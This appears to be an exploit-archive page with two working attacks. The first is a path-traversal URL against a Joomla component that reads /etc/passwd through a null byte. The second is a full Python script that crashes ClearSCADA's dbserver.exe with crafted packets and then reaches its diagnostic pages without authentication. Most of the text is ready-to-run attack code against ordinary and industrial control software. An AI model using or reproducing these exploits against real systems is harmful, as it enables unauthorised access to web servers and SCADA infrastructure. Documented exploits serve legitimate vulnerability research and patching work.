An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00

ClearSCADA - Remote Authentication Bypass

#!/usr/bin/env python2
# cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# exploited by triggering an exception in dbserver.exe and taking advantage
# of the way the program handles it.
#
# When an exception occurs, ClearSCADA enters "Safe Mode". This exposes
# its diagnostic functions to remote users without requiring a valid login
# as it normally would. A remote attacker could view sensitive information
# and possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#

import sys
import socket
import httplib
from time import sleep

# Session setup: "IP 127.0.0.1, Session 0"
pkt_1 = (
    "\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
    "\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
    "\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
    "\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
    "\x08\x00\x00\x00"
)

# "CrystalReports"
pkt_2 = (
    "\x00\x00\x00\x00"
    "\x26\x00\x00\x00"
    "\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
    "\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00"
    "\x74\x00\x73\x00\x00\x00"
)

# Class-name list that makes dbserver.exe throw ("Exception Occured")
pkt_3 = (
    "\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00"
    "\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00"
    "\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
    "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00"
    "\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
    "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00"
    "\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00"
    "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00"
    "\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00"  # last w0rd
    "\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
    "\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41"
    "\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61"
    "\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11"
    "\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52"
    "\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61"
    "\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76"
    "\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75"
    "\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x12\x00\x00\x00\x43"
    "\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54"
    "\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
    "\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52"
    "\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
    "\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41"
    "\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45"
    "\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
    "\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53"
    "\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c"
    "\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x0f\x00\x00"
    "\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c"
    "\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00"
)

port = 5481      # dbserver.exe
s_port = 443     # web front end; /diag/Info is 301 (login) normally, 200 in safe mode


def do_ssl(target, port):
    try:
        conn = httplib.HTTPSConnection(target, port)
        conn._http_vsn = 10
        conn._http_vsn_str = "HTTP/1.0"
        conn.request("GET", "/diag/Info")
        resp = conn.getresponse()
        conn.close()
    except Exception, error:
        print("Error: %s" % error)
        return None
    return resp


def main():
    if len(sys.argv) != 2:
        print("Usage: %s <target>" % sys.argv[0])
        sys.exit(0)

    target = sys.argv[1]
    cs = (target, port)

    print("Checking server status...")
    resp = do_ssl(target, s_port)
    if resp is None:
        return

    if resp.status == 301:
        print("Server status is normal.\n")
    elif resp.status == 200:
        print("Server is already in safe mode.")
        sys.exit(1)
    else:
        print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status, resp.reason))

    print("Sending packets to trigger exception...\n")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(cs)
        sock.send(pkt_1)
        resp_1 = sock.recv(32)
        sock.send(pkt_2)
        resp_2 = sock.recv(32)
        sock.send(pkt_3)
        resp_3 = sock.recv(32)
        sock.close()
    except Exception, error:
        print("Error: %s" % error)
        return None

    print("Finished, checking server status again...")
    sleep(1)
    resp = do_ssl(target, s_port)
    if resp is None:
        return

    if resp.status == 301:
        print("Server status is still normal, maybe it's patched..\n")
    elif resp.status == 200:
        print("Server entered \"safe\" mode :)\n")
        print("Surf on over to https://%s:443/diag/Info to explore" % target)
    else:
        print("Server returned %d %s, server state unknown." % (resp.status, resp.reason))


if __name__ == "__main__":
    main()